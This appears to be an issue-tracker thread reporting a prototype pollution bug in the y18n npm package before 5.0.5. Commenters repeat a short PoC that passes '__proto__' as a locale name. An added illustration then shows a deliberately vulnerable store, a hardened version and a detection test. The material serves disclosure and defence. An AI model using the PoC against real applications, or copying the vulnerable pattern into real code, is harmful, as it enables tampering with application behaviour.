y18n@4.0.0 is flagged as vulnerable by automated security checks. Upgrading to version 5.0.5 is recommended.
dced5bon1#
Facing the same issue. This affects the y18n package before 5.0.5. PoC by po6ix:
const y18n = require('y18n')();
y18n.setLocale('__proto__');
y18n.updateLocale({polluted: true});
console.log(polluted); // true
u7up0aaq2#
Facing the same issue!
This affects the package y18n before 5.0.5. PoC by po6ix:
const y18n = require('y18n')();
y18n.setLocale('__proto__');
y18n.updateLocale({polluted: true});
console.log(polluted); // true
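The bug class behind this report, as an added example that is not from the thread and not y18n's source code: a hypothetical locale store keyed by a caller-supplied name, in a vulnerable form and a hardened form, with a check that runs the PoC's call sequence against each. All class, function and marker names are assumptions made for the illustration.

```javascript
// Added illustration, not y18n's source: every name below is hypothetical.

// Vulnerable shape: a plain object used as a map keyed by a caller-supplied locale.
class NaiveLocaleStore {
  constructor() { this.cache = {}; this.locale = 'en'; }
  setLocale(locale) { this.locale = locale; }
  updateLocale(entries) {
    // cache['__proto__'] resolves to Object.prototype, which is truthy, so no
    // bucket is created and the loop writes onto the shared prototype.
    if (!this.cache[this.locale]) this.cache[this.locale] = {};
    for (const key of Object.keys(entries)) this.cache[this.locale][key] = entries[key];
  }
}

// Hardened shape: prototype-less maps plus rejection of prototype-related keys.
const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);
class SafeLocaleStore {
  constructor() { this.cache = Object.create(null); this.locale = 'en'; }
  setLocale(locale) {
    if (typeof locale !== 'string' || FORBIDDEN.has(locale)) {
      throw new TypeError('rejected locale name');
    }
    this.locale = locale;
  }
  updateLocale(entries) {
    if (!this.cache[this.locale]) this.cache[this.locale] = Object.create(null);
    for (const key of Object.keys(entries)) {
      if (!FORBIDDEN.has(key)) this.cache[this.locale][key] = entries[key];
    }
  }
}

// Runs the call sequence from the PoC against a store class and reports
// whether a marker property leaked onto Object.prototype.
function pollutes(StoreClass) {
  const marker = 'constructed_demo_marker'; // constructed sample value
  try {
    const store = new StoreClass();
    store.setLocale('__proto__');
    store.updateLocale({ [marker]: true });
  } catch (err) { /* a rejected locale name counts as not polluted */ }
  const leaked = ({})[marker] === true;
  delete Object.prototype[marker]; // undo the side effect before returning
  return leaked;
}

console.log('naive store pollutes:', pollutes(NaiveLocaleStore));
console.log('safe store pollutes: ', pollutes(SafeLocaleStore));
```

The same `pollutes` check can be kept as a regression test around any code that uses untrusted strings as object keys.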